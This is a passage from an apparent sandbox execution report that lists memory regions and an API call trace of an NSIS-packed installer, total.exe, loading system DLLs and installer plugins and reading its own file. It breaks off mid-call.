0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 972 start_va = 0x24a0000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 973 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 974 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 975 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 976 start_va = 0x75720000 end_va = 0x75740fff entry_point = 0x75720000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 977 start_va = 0x778a0000 end_va = 0x778e4fff entry_point = 0x778a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 978 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 979 start_va = 0x3d0000 end_va = 0x3ecfff entry_point = 0x3d0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 980 start_va = 0x1c30000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 981 start_va = 0x25a0000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 982 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 983 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 984 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 985 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 986 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 987 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 988 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 989 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 990 start_va = 0x26a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 991 start_va = 0x2b0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 992 start_va = 0x2b0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 993 start_va = 0x75710000 end_va = 0x75715fff entry_point = 0x75710000 region_type = mapped_file name = "system.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll") Region: id = 994 start_va = 0x75700000 end_va = 0x75704fff entry_point = 0x75700000 region_type = mapped_file name = "userinfo.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll") Region: id = 995 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 996 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "userinfo.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\UserInfo.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\userinfo.dll") Region: id = 997 start_va = 0x75700000 end_va = 0x75704fff entry_point = 0x75700000 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll") Region: id = 1049 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1050 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1051 start_va = 0x756f0000 end_va = 0x756f4fff entry_point = 0x756f0000 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\nsexec.dll") Thread: id = 54 os_tid = 0x850 [0146.237] SetErrorMode (uMode=0x8001) returned 0x0 [0146.237] GetVersion () returned 0x1db10106 [0146.239] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75c90000 [0146.239] GetProcAddress (hModule=0x75c90000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0146.239] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.239] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0146.239] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x75540000 [0147.084] lstrlenA (lpString="UXTHEME") returned 7 [0147.084] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.084] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0147.084] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x75120000 [0147.801] lstrlenA (lpString="USERENV") returned 7 [0147.801] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.801] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0147.801] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x76130000 [0150.240] lstrlenA (lpString="SETUPAPI") returned 8 [0150.240] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.240] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0150.240] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x750d0000 [0150.743] lstrlenA (lpString="APPHELP") returned 7 [0150.743] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.743] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0150.743] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x74fd0000 [0151.424] lstrlenA (lpString="PROPSYS") returned 7 [0151.424] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.425] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0151.425] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x75520000 [0151.855] lstrlenA (lpString="DWMAPI") returned 6 [0151.855] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.855] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0151.855] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x75880000 [0151.856] lstrlenA (lpString="CRYPTBASE") returned 9 [0151.856] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.856] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0151.857] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x74f90000 [0152.728] lstrlenA (lpString="OLEACC") returned 6 [0152.728] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0152.728] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0152.729] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x77570000 [0153.333] lstrlenA (lpString="CLBCATQ") returned 7 [0153.333] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0153.333] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.333] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0153.333] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x75760000 [0155.069] GetProcAddress (hModule=0x75760000, lpProcName="GetFileVersionInfoA") returned 0x75761ced [0155.069] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0155.069] GetSystemDirectoryA (in: lpBuffer=0x18fcc0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.069] wsprintfA (in: param_1=0x18fcd3, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0155.069] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x75750000 [0155.132] GetProcAddress (hModule=0x75750000, lpProcName="SHGetFolderPathA") returned 0x75751528 [0155.132] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x75920000 [0155.133] GetProcAddress (hModule=0x75920000, lpProcName=0x1b5) returned 0x7593bee6 [0155.133] IsOS (dwOS=0x1e) returned 1 [0155.159] InitCommonControls () [0155.159] OleInitialize (pvReserved=0x0) returned 0x0 [0155.211] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x18fe2c, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x18fe2c) returned 0x1 [0157.821] lstrcpynA (in: lpString1=0x42ec00, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0157.821] GetCommandLineA () returned="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " [0157.821] lstrcpynA (in: lpString1=0x435000, lpString2="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" ") returned="\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " [0157.823] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x436400 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0157.828] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.828] lstrcatA (in: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.828] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.828] GetLastError () returned 0xb7 [0157.828] GetTickCount () returned 0x2fd9f [0157.828] GetTempFileNameA (in: lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", lpPrefixString="nsd", uUnique=0x0, lpTempFileName=0x436000 | out: lpTempFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nsdFD9F.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nsdfd9f.tmp")) returned 0xfd9f [0157.829] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nsdFD9F.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nsdfd9f.tmp")) returned 1 [0157.829] GetTickCount () returned 0x2fd9f [0157.829] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x436c00, nSize=0x400 | out: lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2e [0157.829] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2020 [0157.829] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0x174 [0157.830] lstrcpynA (in: lpString1=0x435c00, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.830] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0157.830] lstrcpynA (in: lpString1=0x437000, lpString2="total.exe", iMaxLength=1024 | out: lpString1="total.exe") returned="total.exe" [0157.830] GetFileSize (in: hFile=0x174, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc9298 [0157.830] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.830] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.831] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.832] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, 